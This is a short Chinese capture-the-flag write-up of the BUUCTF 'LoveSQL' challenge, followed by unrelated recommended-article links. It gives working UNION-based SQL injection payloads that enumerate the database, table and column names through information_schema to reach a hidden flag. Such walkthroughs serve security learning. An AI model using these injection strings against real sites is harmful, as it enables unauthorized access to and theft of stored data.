BUU10 [极客大挑战 2019]LoveSQL1

万能用户名(密码随便)

登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见

相关推荐
计算机毕设定制辅导-无忧学长43 分钟前
西门子 PLC 与 Modbus 集成:S7-1500 RTU/TCP 配置指南(一)
服务器·数据库·tcp/ip
程序员柳1 小时前
基于微信小程序的校园二手交易平台、微信小程序校园二手商城源代码+数据库+使用说明,layui+微信小程序+Spring Boot
数据库·微信小程序·layui
梦在深巷、2 小时前
MySQL/MariaDB数据库主从复制之基于二进制日志的方式
linux·数据库·mysql·mariadb
IT乌鸦坐飞机2 小时前
ansible部署数据库服务随机启动并创建用户和设置用户有完全权限
数据库·ansible·centos7
IT_10242 小时前
Spring Boot项目开发实战销售管理系统——数据库设计!
java·开发语言·数据库·spring boot·后端·oracle
祁思妙想3 小时前
八股学习(三)---MySQL
数据库·学习·mysql
惊骇世俗王某人3 小时前
1.MySQL之如何定位慢查询
数据库·mysql
程序员张34 小时前
SQL分析与打印-p6spy组件
spring boot·sql·mybatis·mybatisplus·p6spy
秦歌6664 小时前
向量数据库-Milvus快速入门
数据库·milvus
Edingbrugh.南空5 小时前
Flink SQLServer CDC 环境配置与验证
数据库·sqlserver·flink